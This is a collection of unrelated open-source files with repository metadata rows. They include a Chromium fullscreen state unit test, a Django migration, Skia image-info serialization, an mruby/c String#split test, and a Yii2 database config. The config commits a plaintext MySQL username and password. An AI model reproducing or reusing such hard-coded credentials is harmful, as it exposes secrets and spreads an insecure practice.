    case STATE_BROWSER_FULLSCREEN_NO_CHROME:
    case STATE_BROWSER_FULLSCREEN_WITH_CHROME:
    case STATE_TAB_FULLSCREEN:
    case STATE_TAB_BROWSER_FULLSCREEN:
    case STATE_TAB_BROWSER_FULLSCREEN_CHROME:
      EXPECT_EQ(FullscreenControllerTestWindow::FULLSCREEN,
                window_->state()) << GetAndClearDebugLog();
      break;

    case STATE_TO_NORMAL:
      EXPECT_EQ(FullscreenControllerTestWindow::TO_NORMAL,
                window_->state()) << GetAndClearDebugLog();
      break;

    // All pending enter-fullscreen variants map to TO_FULLSCREEN.
    case STATE_TO_BROWSER_FULLSCREEN_NO_CHROME:
    case STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME:
    case STATE_TO_TAB_FULLSCREEN:
      EXPECT_EQ(FullscreenControllerTestWindow::TO_FULLSCREEN,
                window_->state()) << GetAndClearDebugLog();
      break;

    default:
      NOTREACHED() << GetAndClearDebugLog();
  }
  FullscreenControllerStateTest::VerifyWindowState();
}
bool FullscreenControllerStateUnitTest::ShouldSkipStateAndEventPair(
    State state, Event event) {
#if defined(OS_MACOSX)
  // TODO(scheib) Toggle, Window Event, Toggle, Toggle on Mac as exposed by
  // test *.STATE_TO_NORMAL__TOGGLE_FULLSCREEN runs interactively and exits to
  // Normal. This doesn't appear to be the desired result, and would add
  // too much complexity to mimic in our simple FullscreenControllerTestWindow.
  // http://crbug.com/156968
  if ((state == STATE_TO_NORMAL ||
       state == STATE_TO_BROWSER_FULLSCREEN_NO_CHROME ||
       state == STATE_TO_TAB_FULLSCREEN) &&
      event == TOGGLE_FULLSCREEN)
    return true;
#endif
  return FullscreenControllerStateTest::ShouldSkipStateAndEventPair(state,
                                                                    event);
}

void FullscreenControllerStateUnitTest::TestStateAndEvent(State state,
                                                          Event event,
                                                          bool reentrant) {
  // Propagate the reentrancy mode to the mock window before delegating to
  // the shared state/event test logic.
  window_->set_reentrant(reentrant);
  FullscreenControllerStateTest::TestStateAndEvent(state, event, reentrant);
}

Browser* FullscreenControllerStateUnitTest::GetBrowser() {
  return BrowserWithTestWindowTest::browser();
}
// Tests -----------------------------------------------------------------------
// Convenience macros: define one gtest for a (state, event) pair, once
// without and (via TEST_EVENT) once with reentrant window-change callbacks
// (test name suffixed "_Reentrant").
#define TEST_EVENT_INNER(state, event, reentrant, reentrant_id) \
    TEST_F(FullscreenControllerStateUnitTest, \
           state##__##event##reentrant_id) { \
      AddTab(browser(), GURL(chrome::kAboutBlankURL)); \
      ASSERT_NO_FATAL_FAILURE(TestStateAndEvent(state, event, reentrant)) \
          << GetAndClearDebugLog(); \
    }
    // Progress of tests can be examined by inserting the following line:
    // LOG(INFO) << GetAndClearDebugLog(); }

#define TEST_EVENT(state, event) \
    TEST_EVENT_INNER(state, event, false, ); \
    TEST_EVENT_INNER(state, event, true, _Reentrant);
// Soak tests:
// Tests all states with all permutations of multiple events to detect lingering
// state issues that would bleed over to other states.
// I.E. for each state test all combinations of events E1, E2, E3.
//
// This produces coverage for event sequences that may happen normally but
// would not be exposed by traversing to each state via TransitionToState().
// TransitionToState() always takes the same path even when multiple paths
// exist.
TEST_F(FullscreenControllerStateUnitTest, TransitionsForEachState) {
  // A tab is needed for tab fullscreen.
  AddTab(browser(), GURL(chrome::kAboutBlankURL));
  // Exhaustively exercise multi-event sequences from every state.
  TestTransitionsForEachState();
  // Progress of test can be examined via LOG(INFO) << GetAndClearDebugLog();
}
// Individual tests for each pair of state and event:
// Individual tests for each pair of state and event.
// Each group below covers one starting state against every event.

// Starting state: STATE_NORMAL.
TEST_EVENT(STATE_NORMAL, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_NORMAL, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_NORMAL, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_NORMAL, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_NORMAL, METRO_SNAP_TRUE);
TEST_EVENT(STATE_NORMAL, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_NORMAL, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_NORMAL, BUBBLE_ALLOW);
TEST_EVENT(STATE_NORMAL, BUBBLE_DENY);
TEST_EVENT(STATE_NORMAL, WINDOW_CHANGE);

// Starting state: STATE_BROWSER_FULLSCREEN_NO_CHROME.
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_NO_CHROME, WINDOW_CHANGE);

// Starting state: STATE_BROWSER_FULLSCREEN_WITH_CHROME.
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_BROWSER_FULLSCREEN_WITH_CHROME, WINDOW_CHANGE);

// Starting state: STATE_METRO_SNAP (Windows only).
#if defined(OS_WIN)
TEST_EVENT(STATE_METRO_SNAP, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_METRO_SNAP, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_METRO_SNAP, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_METRO_SNAP, TAB_FULLSCREEN_FALSE);
TEST_EVENT(STATE_METRO_SNAP, METRO_SNAP_TRUE);
TEST_EVENT(STATE_METRO_SNAP, METRO_SNAP_FALSE);
TEST_EVENT(STATE_METRO_SNAP, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_METRO_SNAP, BUBBLE_ALLOW);
TEST_EVENT(STATE_METRO_SNAP, BUBBLE_DENY);
TEST_EVENT(STATE_METRO_SNAP, WINDOW_CHANGE);
#endif

// Starting state: STATE_TAB_FULLSCREEN.
TEST_EVENT(STATE_TAB_FULLSCREEN, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TAB_FULLSCREEN, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TAB_FULLSCREEN, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TAB_FULLSCREEN, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TAB_FULLSCREEN, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TAB_FULLSCREEN, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TAB_FULLSCREEN, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TAB_FULLSCREEN, BUBBLE_ALLOW);
TEST_EVENT(STATE_TAB_FULLSCREEN, BUBBLE_DENY);
TEST_EVENT(STATE_TAB_FULLSCREEN, WINDOW_CHANGE);

// Starting state: STATE_TAB_BROWSER_FULLSCREEN.
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, BUBBLE_ALLOW);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, BUBBLE_DENY);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN, WINDOW_CHANGE);

// Starting state: STATE_TAB_BROWSER_FULLSCREEN_CHROME.
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_TAB_BROWSER_FULLSCREEN_CHROME, WINDOW_CHANGE);

// Starting state: STATE_TO_NORMAL (transition pending).
TEST_EVENT(STATE_TO_NORMAL, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_NORMAL, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_NORMAL, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_NORMAL, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_NORMAL, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_NORMAL, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_NORMAL, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_NORMAL, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_NORMAL, BUBBLE_DENY);
TEST_EVENT(STATE_TO_NORMAL, WINDOW_CHANGE);

// Starting state: STATE_TO_BROWSER_FULLSCREEN_NO_CHROME (transition pending).
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME, WINDOW_CHANGE);

// Starting state: STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME (transition
// pending).
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, BUBBLE_DENY);
TEST_EVENT(STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME, WINDOW_CHANGE);

// Starting state: STATE_TO_TAB_FULLSCREEN (transition pending).
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TOGGLE_FULLSCREEN);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TOGGLE_FULLSCREEN_CHROME);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TAB_FULLSCREEN_TRUE);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, TAB_FULLSCREEN_FALSE);
#if defined(OS_WIN)
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, METRO_SNAP_TRUE);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, METRO_SNAP_FALSE);
#endif
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, BUBBLE_EXIT_LINK);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, BUBBLE_ALLOW);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, BUBBLE_DENY);
TEST_EVENT(STATE_TO_TAB_FULLSCREEN, WINDOW_CHANGE);
// Specific one-off tests for known issues:
// TODO(scheib) Toggling Tab fullscreen while pending Tab or
// Browser fullscreen is broken currently http://crbug.com/154196
TEST_F(FullscreenControllerStateUnitTest,
       DISABLED_ToggleTabWhenPendingBrowser) {
#if !defined(OS_WIN)  // Only possible without reentrancy
  AddTab(browser(), GURL(chrome::kAboutBlankURL));
  ASSERT_NO_FATAL_FAILURE(
      TransitionToState(STATE_TO_BROWSER_FULLSCREEN_NO_CHROME))
      << GetAndClearDebugLog();

  // Toggle tab fullscreen on and off while the browser-fullscreen
  // transition is still pending, then let the window settle.
  ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_TRUE)) << GetAndClearDebugLog();
  ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_FALSE)) << GetAndClearDebugLog();
  ASSERT_TRUE(InvokeEvent(WINDOW_CHANGE)) << GetAndClearDebugLog();
#endif
}

// TODO(scheib) Toggling Tab fullscreen while pending Tab or
// Browser fullscreen is broken currently http://crbug.com/154196
TEST_F(FullscreenControllerStateUnitTest, DISABLED_ToggleTabWhenPendingTab) {
#if !defined(OS_WIN)  // Only possible without reentrancy
  AddTab(browser(), GURL(chrome::kAboutBlankURL));
  ASSERT_NO_FATAL_FAILURE(
      TransitionToState(STATE_TO_TAB_FULLSCREEN))
      << GetAndClearDebugLog();

  // Same toggle sequence, but starting from a pending tab-fullscreen
  // transition instead of a pending browser-fullscreen one.
  ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_TRUE)) << GetAndClearDebugLog();
  ASSERT_TRUE(InvokeEvent(TAB_FULLSCREEN_FALSE)) << GetAndClearDebugLog();
  ASSERT_TRUE(InvokeEvent(WINDOW_CHANGE)) << GetAndClearDebugLog();
#endif
}
// Debugging utility: Display the transition tables. Intentionally disabled
TEST_F(FullscreenControllerStateUnitTest, DISABLED_DebugLogStateTables) {
  std::ostringstream output;
  output << "\n\nTransition Table:";
  output << GetTransitionTableAsString();

  output << "\n\nInitial transitions:";
  output << GetStateTransitionsAsString();

  // Calculate all transition pairs.
  for (int state1_int = 0; state1_int < NUM_STATES; state1_int++) {
    State state1 = static_cast<State>(state1_int);
    for (int state2_int = 0; state2_int < NUM_STATES; state2_int++) {
      State state2 = static_cast<State>(state2_int);
      if (ShouldSkipStateAndEventPair(state1, EVENT_INVALID) ||
          ShouldSkipStateAndEventPair(state2, EVENT_INVALID))
        continue;
      // Compute the transition; log pairs that unexpectedly have no path.
      if (NextTransitionInShortestPath(state1, state2, NUM_STATES).state ==
          STATE_INVALID) {
        LOG(ERROR) << "Should be skipping state transitions for: "
                   << GetStateString(state1) << " " << GetStateString(state2);
      }
    }
  }

  output << "\n\nAll transitions:";
  output << GetStateTransitionsAsString();
  LOG(INFO) << output.str();
}
| zcbenz/cefode-chromium | chrome/browser/ui/fullscreen/fullscreen_controller_state_unittest.cc | C++ | bsd-3-clause | 21,739 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-12 08:55
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import tagulous.models.fields
class Migration(migrations.Migration):
    """Promote ``core.Tag`` to a tagulous tag *tree*.

    Adds the tree bookkeeping columns (``label``, ``level``, ``parent``,
    ``path``), switches the ``tags`` fields on ``Analysis`` and
    ``Experiment`` to tree-enabled ``TagField``s, and enforces uniqueness
    of ``(slug, parent)``.  Auto-generated by Django 1.11.
    """

    dependencies = [
        ('core', '0001_initial'),
    ]

    operations = [
        # The tag's own name, without the names of its ancestors.
        migrations.AddField(
            model_name='tag',
            name='label',
            field=models.CharField(default='', help_text='The name of the tag, without ancestors', max_length=255),
            preserve_default=False,
        ),
        # Depth of the tag in the tree (root tags are level 1).
        migrations.AddField(
            model_name='tag',
            name='level',
            field=models.IntegerField(default=1, help_text='The level of the tag in the tree'),
        ),
        # Link to the parent tag; deleting a parent cascades to children.
        migrations.AddField(
            model_name='tag',
            name='parent',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='core.Tag'),
        ),
        # Full materialized path of the tag within the tree.
        migrations.AddField(
            model_name='tag',
            name='path',
            field=models.TextField(default=''),
            preserve_default=False,
        ),
        # Re-declare the tag fields with tree=True so they use the tree model.
        migrations.AlterField(
            model_name='analysis',
            name='tags',
            field=tagulous.models.fields.TagField(_set_tag_meta=True, force_lowercase=True, help_text='Enter a comma-separated tag string', to='core.Tag', tree=True),
        ),
        migrations.AlterField(
            model_name='experiment',
            name='tags',
            field=tagulous.models.fields.TagField(_set_tag_meta=True, force_lowercase=True, help_text='Enter a comma-separated tag string', to='core.Tag', tree=True),
        ),
        # A slug only needs to be unique among siblings, not globally.
        migrations.AlterUniqueTogether(
            name='tag',
            unique_together=set([('slug', 'parent')]),
        ),
    ]
| Candihub/pixel | apps/core/migrations/0002_auto_20171012_0855.py | Python | bsd-3-clause | 1,878 |
/*
* Copyright 2010 Google Inc.
*
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
#include "SkImageInfo.h"
#include "SkReadBuffer.h"
#include "SkWriteBuffer.h"
// Range checks used when deserializing an SkImageInfo: each enum value read
// from the buffer must lie within [0, kLastEnum_*] to be accepted.
static bool profile_type_is_valid(SkColorProfileType profileType) {
  return (profileType >= 0) && (profileType <= kLastEnum_SkColorProfileType);
}

static bool alpha_type_is_valid(SkAlphaType alphaType) {
  return (alphaType >= 0) && (alphaType <= kLastEnum_SkAlphaType);
}

static bool color_type_is_valid(SkColorType colorType) {
  return (colorType >= 0) && (colorType <= kLastEnum_SkColorType);
}
void SkImageInfo::unflatten(SkReadBuffer& buffer) {
  fWidth = buffer.read32();
  fHeight = buffer.read32();

  // The three enums are packed by flatten() into one 32-bit word:
  // 0x00PPAACC (profile, alpha, color type -- one byte each).
  uint32_t packed = buffer.read32();
  SkASSERT(0 == (packed >> 24));
  fProfileType = (SkColorProfileType)((packed >> 16) & 0xFF);
  fAlphaType = (SkAlphaType)((packed >> 8) & 0xFF);
  fColorType = (SkColorType)((packed >> 0) & 0xFF);

  // Mark the buffer invalid if any decoded enum is out of range.
  buffer.validate(profile_type_is_valid(fProfileType) &&
                  alpha_type_is_valid(fAlphaType) &&
                  color_type_is_valid(fColorType));
}

void SkImageInfo::flatten(SkWriteBuffer& buffer) const {
  buffer.write32(fWidth);
  buffer.write32(fHeight);

  // Pack the three enums into one word; each must fit in a single byte.
  SkASSERT(0 == (fProfileType & ~0xFF));
  SkASSERT(0 == (fAlphaType & ~0xFF));
  SkASSERT(0 == (fColorType & ~0xFF));
  uint32_t packed = (fProfileType << 16) | (fAlphaType << 8) | fColorType;
  buffer.write32(packed);
}
// Validates |alphaType| against |colorType| and canonicalizes it. Returns
// false when the combination is unsupported; otherwise writes the canonical
// alpha type to |*canonical| (if non-NULL) and returns true.
bool SkColorTypeValidateAlphaType(SkColorType colorType, SkAlphaType alphaType,
                                  SkAlphaType* canonical) {
  switch (colorType) {
    case kUnknown_SkColorType:
      alphaType = kIgnore_SkAlphaType;
      break;
    case kAlpha_8_SkColorType:
      // Alpha-only pixels carry no color to premultiply, so unpremul and
      // premul are equivalent; normalize to premul.
      if (kUnpremul_SkAlphaType == alphaType) {
        alphaType = kPremul_SkAlphaType;
      }
      // fall-through
    case kIndex_8_SkColorType:
    case kARGB_4444_SkColorType:
    case kRGBA_8888_SkColorType:
    case kBGRA_8888_SkColorType:
      // These formats have an alpha channel, so "ignore" is contradictory.
      if (kIgnore_SkAlphaType == alphaType) {
        return false;
      }
      break;
    case kRGB_565_SkColorType:
      // 565 has no alpha channel: always opaque.
      alphaType = kOpaque_SkAlphaType;
      break;
    default:
      return false;
  }
  if (canonical) {
    *canonical = alphaType;
  }
  return true;
}
| chenlian2015/skia_from_google | src/core/SkImageInfo.cpp | C++ | bsd-3-clause | 2,443 |
#!/usr/bin/env python3
#==============================================================================
# author : Pavel Polishchuk
# date : 14-08-2019
# version :
# python_version :
# copyright : Pavel Polishchuk 2019
# license :
#==============================================================================
# Single source of truth for the crem package version (PEP 396 style).
__version__ = "0.2.9"
| DrrDom/crem | crem/__init__.py | Python | bsd-3-clause | 379 |
<?php

// Database connection component for the Yii 2 application.
// NOTE(review): credentials are committed in plain text -- consider loading
// them from environment variables or a local, untracked config override.
return [
    'class' => 'yii\db\Connection',
    'dsn' => 'mysql:host=localhost;dbname=yii2bank',
    'username' => 'bankadmin',
    'password' => '0Filfn6BcjvvgHy6',
    'charset' => 'utf8',
];
| K4lx4s/yii2bank | config/db.php | PHP | bsd-3-clause | 202 |
# frozen_string_literal: true
class StringSplitTest < MrubycTestCase
  #
  # Regex not supported: mruby/c String#split only accepts plain String
  # separators (or nil), so every case below uses literal strings.
  #

  # NOTE(review): "Sring" looks like a typo for "String"; left unchanged
  # because the description text is runtime data for the test framework.
  description "Sring"
  def string_case
    assert_equal ["a","b","c"], "a,b,c".split(",")
    assert_equal ["a","","b","c"], "a,,b,c".split(",")
    assert_equal ["a","b:c","d"], "a::b:c::d".split("::")
    assert_equal ["a","b:c","d:"], "a::b:c::d:".split("::")
    # Trailing empty fields produced by trailing separators are dropped...
    assert_equal ["a","b:c","d"], "a::b:c::d::".split("::")
    # ...but a leftover partial separator is kept as a final field.
    assert_equal ["a", "b:c", "d", ":"], "a::b:c::d:::".split("::")
  end

  description "space"
  def space_case
    # A single-space separator means awk-style splitting: leading whitespace
    # is skipped and any run of whitespace acts as one separator.
    assert_equal ["a", "b", "c"], " a \t b \n c\r\n".split(" ")
    assert_equal ["a", "b", "c"], "a \t b \n c\r\n".split(" ")
    assert_equal ["a", "b", "c"], " a \t b \n c".split(" ")
    assert_equal ["a", "b", "c"], "a \t b \n c".split(" ")
    assert_equal ["aa", "bb", "cc"], " aa bb cc ".split(" ")
    assert_equal ["aa", "bb", "cc"], "aa bb cc ".split(" ")
    assert_equal ["aa", "bb", "cc"], " aa bb cc".split(" ")
    assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ")
  end

  description "nil"
  def nil_case
    # nil (or no argument) behaves like the awk-style " " separator.
    assert_equal ["a", "b", "c"], " a \t b \n c".split()
    assert_equal ["a", "b", "c"], " a \t b \n c".split(nil)
  end

  description "empty string"
  def empty_string_case
    # An empty separator splits the string into individual characters.
    # NOTE(review): source literal reconstructed from the expected array
    # (whitespace runs appear collapsed in the archived copy) -- confirm
    # against upstream.
    assert_equal [" ", " ", " ", "a", " ", "\t", " ", " ", "b", " ", "\n", " ", " ", "c"], "   a \t  b \n  c".split("")
  end

  description "limit"
  def limit_case
    # limit == 0: trailing empty fields removed; limit > 0: at most that
    # many fields (the last keeps the remainder); limit < 0: no limit and
    # trailing empty fields are preserved.
    assert_equal ["a", "b", "", "c"], "a,b,,c,,".split(",", 0)
    assert_equal ["a,b,,c,,"], "a,b,,c,,".split(",", 1)
    assert_equal ["a", "b,,c,,"], "a,b,,c,,".split(",", 2)
    assert_equal ["a", "b", ",c,,"], "a,b,,c,,".split(",", 3)
    assert_equal ["a", "b", "", "c,,"], "a,b,,c,,".split(",", 4)
    assert_equal ["a", "b", "", "c", ","], "a,b,,c,,".split(",", 5)
    assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", 6)
    assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", 7)
    assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", -1)
    assert_equal ["a", "b", "", "c", "", ""], "a,b,,c,,".split(",", -2)

    assert_equal ["aa", "bb", "cc"], " aa bb cc ".split(" ", 0)
    assert_equal [" aa bb cc "], " aa bb cc ".split(" ", 1)
    assert_equal ["aa", "bb cc "], " aa bb cc ".split(" ", 2)
    assert_equal ["aa", "bb", "cc "], " aa bb cc ".split(" ", 3)
    assert_equal ["aa", "bb", "cc", ""], " aa bb cc ".split(" ", 4)
    assert_equal ["aa", "bb", "cc", ""], " aa bb cc ".split(" ", 5)
    assert_equal ["aa", "bb", "cc", ""], " aa bb cc ".split(" ",-1)

    assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ", 0)
    assert_equal ["aa bb cc"], "aa bb cc".split(" ", 1)
    assert_equal ["aa", "bb cc"], "aa bb cc".split(" ", 2)
    assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ", 3)
    assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ", 4)
    assert_equal ["aa", "bb", "cc"], "aa bb cc".split(" ",-1)
  end

  description "empty source"
  def empty_source_case
    # Splitting an empty string always yields an empty array, regardless of
    # separator or limit.
    assert_equal [], "".split(",")
    assert_equal [], "".split(",", 0)
    assert_equal [], "".split(",", 1)
    assert_equal [], "".split(",",-1)
    assert_equal [], "".split("")
    assert_equal [], "".split("", 0)
    assert_equal [], "".split("", 1)
    assert_equal [], "".split("",-1)
    assert_equal [], "".split(" ")
    assert_equal [], "".split(" ", 0)
    assert_equal [], "".split(" ", 1)
    assert_equal [], "".split(" ",-1)
  end

  description "delimiter only"
  def delimiter_only_case
    assert_equal [], ",".split(",")
    assert_equal [], ",".split(",", 0)
    assert_equal [","], ",".split(",", 1)
    assert_equal ["",""], ",".split(",",-1)
    assert_equal [], ",,".split(",")
    assert_equal [], ",,".split(",", 0)
    assert_equal [",,"], ",,".split(",", 1)
    assert_equal ["","",""],",,".split(",",-1)
    assert_equal [], " ".split(" ")
    assert_equal [], " ".split(" ", 0)
    assert_equal [" "], " ".split(" ", 1)
    assert_equal [""], " ".split(" ",-1)
    # NOTE(review): the following group uses a two-space source string in
    # upstream mruby/c; whitespace runs appear collapsed in the archived
    # copy -- confirm against upstream.
    assert_equal [], "  ".split(" ")
    assert_equal [], "  ".split(" ", 0)
    assert_equal ["  "], "  ".split(" ", 1)
    assert_equal [""], "  ".split(" ",-1)
  end
end
| mrubyc/mrubyc | test/string_split_test.rb | Ruby | bsd-3-clause | 4,453 |
/***********************************************************************************************************************
**
** Copyright (c) 2011, 2014 ETH Zurich
** All rights reserved.
**
** Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
** following conditions are met:
**
** * Redistributions of source code must retain the above copyright notice, this list of conditions and the
** following disclaimer.
** * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
** following disclaimer in the documentation and/or other materials provided with the distribution.
** * Neither the name of the ETH Zurich nor the names of its contributors may be used to endorse or promote products
** derived from this software without specific prior written permission.
**
**
** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
** INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
** DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
